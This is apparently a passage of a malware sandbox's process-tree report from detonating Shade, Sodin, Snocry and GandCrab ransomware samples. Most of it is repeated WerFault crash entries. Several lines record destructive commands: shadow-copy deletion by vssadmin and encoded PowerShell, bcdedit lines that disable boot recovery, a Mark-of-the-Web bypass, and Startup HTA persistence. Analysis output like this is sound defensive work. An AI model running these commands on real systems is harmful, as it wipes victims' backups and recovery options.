                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 924
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:10648
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 972
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:11464
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 904
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5928
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 948
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:10552
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 924
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:10452
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 972
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:6676
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1000
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:11360
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 988
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:9144
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 996
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5224
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 944
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:9496
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 916
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:9800
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 960
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:7628
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1012
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12824
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 680
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:9428
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 664
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:6928
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 924
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5632
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 984
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:3912
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 680
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:7116
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 900
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5412
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1012
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:2804
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 664
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12332
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 872
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:8988
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 928
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:9612
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 884
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12656
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 848
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5556
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 944
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12800
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1068
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5268
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1052
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12992
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 960
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:7236
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 832
                                                                            4⤵
                                                                              PID:11252
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 956
                                                                              4⤵
                                                                                PID:8320
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 940
                                                                                4⤵
                                                                                  PID:8956
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 808
                                                                                  4⤵
                                                                                    PID:10736
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 812
                                                                                    4⤵
                                                                                      PID:2952
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 708
                                                                                      4⤵
                                                                                        PID:8724
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 856
                                                                                        4⤵
                                                                                          PID:3208
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1052
                                                                                          4⤵
                                                                                            PID:10680
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 904
                                                                                            4⤵
                                                                                              PID:9996
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 960
                                                                                              4⤵
                                                                                                PID:4976
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 956
                                                                                                4⤵
                                                                                                  PID:5172
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 680
                                                                                                  4⤵
                                                                                                    PID:7156
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 808
                                                                                                    4⤵
                                                                                                      PID:6072
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 996
                                                                                                      4⤵
                                                                                                        PID:12900
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 888
                                                                                                        4⤵
                                                                                                          PID:12476
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1052
                                                                                                          4⤵
                                                                                                            PID:3180
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe"
                                                                                                            4⤵
                                                                                                              PID:9116
                                                                                                              • C:\Windows\system32\mode.com
                                                                                                                mode con cp select=1251
                                                                                                                5⤵
                                                                                                                  PID:9652
                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                  5⤵
                                                                                                                  • Interacts with shadow copies
                                                                                                                  PID:4260
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 932
                                                                                                                4⤵
                                                                                                                  PID:7776
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1224
                                                                                                                  4⤵
                                                                                                                    PID:1844
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1364
                                                                                                                    4⤵
                                                                                                                      PID:8064
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1372
                                                                                                                      4⤵
                                                                                                                        PID:7060
                                                                                                                      • C:\Windows\System32\mshta.exe
                                                                                                                        "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                                                                                        4⤵
                                                                                                                          PID:5660
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1176
                                                                                                                          4⤵
                                                                                                                            PID:6412
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1248
                                                                                                                            4⤵
                                                                                                                              PID:5244
                                                                                                                            • C:\Windows\System32\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                                                                                              4⤵
                                                                                                                                PID:6396
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1568
                                                                                                                                4⤵
                                                                                                                                  PID:7008
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1604
                                                                                                                                  4⤵
                                                                                                                                    PID:8572
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.pbq-0813dd814b07bb9acf1114bd8a5f4b4b624c667464bac48d91ebd9f9c8e640c7.exe
                                                                                                                                  Trojan-Ransom.Win32.Shade.pbq-0813dd814b07bb9acf1114bd8a5f4b4b624c667464bac48d91ebd9f9c8e640c7.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2084
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.pyr-03246cda354d8efbc9e22057cc283609825f15cf33ddc5296deac54c2b540218.exe
                                                                                                                                  Trojan-Ransom.Win32.Shade.pyr-03246cda354d8efbc9e22057cc283609825f15cf33ddc5296deac54c2b540218.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1020
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.qjq-7ce52df2e1186532c119b3ad42fad1012bb78e6393bff209086dec386bbd49af.exe
                                                                                                                                  Trojan-Ransom.Win32.Shade.qjq-7ce52df2e1186532c119b3ad42fad1012bb78e6393bff209086dec386bbd49af.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3436
                                                                                                                                  • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.qjq-7ce52df2e1186532c119b3ad42fad1012bb78e6393bff209086dec386bbd49af.exe
                                                                                                                                    C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.qjq-7ce52df2e1186532c119b3ad42fad1012bb78e6393bff209086dec386bbd49af.exe
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6932
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Snocry.cvy-c5e5fd674ac39c58533687c8d8ed51c465459b5b8e0f52e8a1b0f692c500e3b0.exe
                                                                                                                                  Trojan-Ransom.Win32.Snocry.cvy-c5e5fd674ac39c58533687c8d8ed51c465459b5b8e0f52e8a1b0f692c500e3b0.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2256
                                                                                                                                  • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Snocry.cvy-c5e5fd674ac39c58533687c8d8ed51c465459b5b8e0f52e8a1b0f692c500e3b0.exe
                                                                                                                                    C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Snocry.cvy-c5e5fd674ac39c58533687c8d8ed51c465459b5b8e0f52e8a1b0f692c500e3b0.exe /AutoIt3ExecuteScript "C:\Users\Admin\AppData\Local\Temp\delph1.dat"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:1684
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /C echo. > "C:\Users\Admin\AppData\Roaming\Isass.exe":Zone.Identifier
                                                                                                                                      5⤵
                                                                                                                                      • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • NTFS ADS
                                                                                                                                      PID:12380
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Isass.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\Isass.exe
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:12812
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Isass.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Isass.exe /AutoIt3ExecuteScript "C:\Users\Admin\AppData\Local\Temp\delph1.dat"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:11684
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Sodin.aay-d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c.exe
                                                                                                                                  Trojan-Ransom.Win32.Sodin.aay-d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1256
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:9108
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Sodin.aw-6eb992c4c8453e929ebc737780067f78e50a18934358e44db6d95fca3106e8e2.exe
                                                                                                                                  Trojan-Ransom.Win32.Sodin.aw-6eb992c4c8453e929ebc737780067f78e50a18934358e44db6d95fca3106e8e2.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1568
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:6208
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Sodin.bb-f4e5d7a95681d920dda75fe5dd89be249905e2a7712f9b3b39e19351f5ef5e69.exe
                                                                                                                                  Trojan-Ransom.Win32.Sodin.bb-f4e5d7a95681d920dda75fe5dd89be249905e2a7712f9b3b39e19351f5ef5e69.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops desktop.ini file(s)
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1488
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                    4⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:8380
                                                                                                                                • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Sodin.g-1937098609fbbda1b470811a7ffe5fa044058655722d84bd029050d54f2b1496.exe
                                                                                                                                  Trojan-Ransom.Win32.Sodin.g-1937098609fbbda1b470811a7ffe5fa044058655722d84bd029050d54f2b1496.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2960
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                    4⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5408
                                                                                                                                • C:\Users\Admin\Desktop\00374\UDS-Trojan-Ransom.Win32.GandCrypt.a-d804e2eb27a5de0f73cbd490ac49a7998cde6c0fca34c011a2cc8a4bbe242f1e.exe
                                                                                                                                  UDS-Trojan-Ransom.Win32.GandCrypt.a-d804e2eb27a5de0f73cbd490ac49a7998cde6c0fca34c011a2cc8a4bbe242f1e.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:452
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2644 -ip 2644
                                                                                                                              1⤵
                                                                                                                                PID:4416
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2644 -ip 2644
                                                                                                                                1⤵
                                                                                                                                  PID:3748
                                                                                                                                • C:\Windows\SysWOW64\adjustidebug.exe
                                                                                                                                  "C:\Windows\SysWOW64\adjustidebug.exe"
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:412
                                                                                                                                  • C:\Windows\SysWOW64\adjustidebug.exe
                                                                                                                                    --ea6442cb
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:3520
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2644 -ip 2644
                                                                                                                                  1⤵
                                                                                                                                    PID:1784
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:8816
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2644 -ip 2644
                                                                                                                                    1⤵
                                                                                                                                      PID:8672
                                                                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:5512
                                                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\qh600s-readme.txt
                                                                                                                                        1⤵
                                                                                                                                          PID:6852
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2644 -ip 2644
                                                                                                                                          1⤵
                                                                                                                                            PID:1528
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2644 -ip 2644
                                                                                                                                            1⤵
                                                                                                                                              PID:11140
                                                                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\0200u43-readme.txt
                                                                                                                                              1⤵
                                                                                                                                                PID:11664
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2644 -ip 2644
                                                                                                                                                1⤵
                                                                                                                                                  PID:1932
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2644 -ip 2644
                                                                                                                                                  1⤵
                                                                                                                                                    PID:13052
                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                    1⤵
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:12588
                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding A40F403D04E627B701E73979DA39B5AE
                                                                                                                                                      2⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:9416
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5A3B5BE3-3478-4FB3-9D95-2052A6D1FA55\lite_installer.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5A3B5BE3-3478-4FB3-9D95-2052A6D1FA55\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4404
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A937830E-E7E6-4479-BC39-5229D926D9C7\seederexe.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\A937830E-E7E6-4479-BC39-5229D926D9C7\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\0FEE3E2A-305E-4A89-8DB0-E186E20B3FE8\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        • Modifies Internet Explorer start page
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:12412
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\0FEE3E2A-305E-4A89-8DB0-E186E20B3FE8\sender.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\0FEE3E2A-305E-4A89-8DB0-E186E20B3FE8\sender.exe --send "/status.xml?clid=2278730-666&uuid=44bcdb30-2396-4f24-ba3a-a0a6d6243612&vnt=Windows 10x64&file-no=8%0A10%0A11%0A12%0A13%0A17%0A18%0A20%0A21%0A22%0A25%0A36%0A40%0A42%0A43%0A57%0A61%0A89%0A102%0A103%0A123%0A124%0A125%0A129%0A"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:11604
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2644 -ip 2644
                                                                                                                                                    1⤵
                                                                                                                                                      PID:7032
                                                                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\m5r5p-wannadie.txt
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5320
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2644 -ip 2644
                                                                                                                                                        1⤵
                                                                                                                                                          PID:9304
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2644 -ip 2644
                                                                                                                                                          1⤵
                                                                                                                                                            PID:8080
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                            1⤵
                                                                                                                                                              PID:8592
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                              1⤵
                                                                                                                                                                PID:12008
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4552 -ip 4552
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:7876
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2644 -ip 2644
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:10984
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2644 -ip 2644
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:10484
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2644 -ip 2644
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7360
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5864
                                                                                                                                                                        • C:\Windows\system32\werfault.exe
                                                                                                                                                                          werfault.exe /h /shared Global\366a29ef062745e7a8cd42c533d191f8 /t 6384 /p 8588
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:10508
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2644 -ip 2644
